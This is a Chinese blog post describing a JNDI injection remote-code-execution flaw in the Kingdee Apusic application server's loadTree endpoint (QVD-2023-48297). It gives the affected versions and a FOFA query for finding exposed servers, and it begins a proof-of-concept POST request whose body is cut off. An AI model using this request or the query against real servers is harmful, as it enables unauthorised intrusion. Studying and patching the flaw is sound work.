金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)

  • 开发
  • 40

0x01 产品简介

金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

0x02 漏洞概述

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)

0x03 影响范围

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

0x04 复现环境

FOFA:app="Apusic应用服务器"

0x05 漏洞复现

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
阅读全部

相关推荐

  2. Apusic应用服务器 createDataSource JNDI注入漏洞(QVD-2023-48476)

    2023-12-23 08:22:05       13 阅读

  4. Apusic应用服务器 未授权目录遍历漏洞

    2023-12-23 08:22:05       13 阅读

  10. 禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)

    2023-12-23 08:22:05       11 阅读

最近更新

  4. TCP协议是安全的吗?

    2023-12-23 08:22:05       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-23 08:22:05       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2023-12-23 08:22:05       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2023-12-23 08:22:05       20 阅读

热门阅读

  1. Vue:defineAsyncComponent(异步组件)、component(动态组件)、keep-alive(缓存组件)

    2023-12-23 08:22:05       44 阅读

  4. 记录为 uni-app的扩展组件(uni-ui)和 微信小程序标签 添加行内样式的正确做法

    2023-12-23 08:22:05       41 阅读

  9. python开发:日志工具logging的使用

    2023-12-23 08:22:05       42 阅读

  10. Python高级语法与正则表达式

    2023-12-23 08:22:05       43 阅读

  12. Golang 在 Mac、Linux、Windows 下如何交叉编译

    2023-12-23 08:22:05       39 阅读

  13. 大数据开发职业规划

    2023-12-23 08:22:05       47 阅读
  14. Cmake

    Cmake

    2023-12-23 08:22:05      47 阅读

  15. 决策树相关算法_ID3_C45_信息熵_剪枝

    2023-12-23 08:22:05       37 阅读

  26. android 13.0 Launcher3长按拖拽时,获取当前是哪一屏,获取当前多少个应用图标

    2023-12-23 08:22:05       39 阅读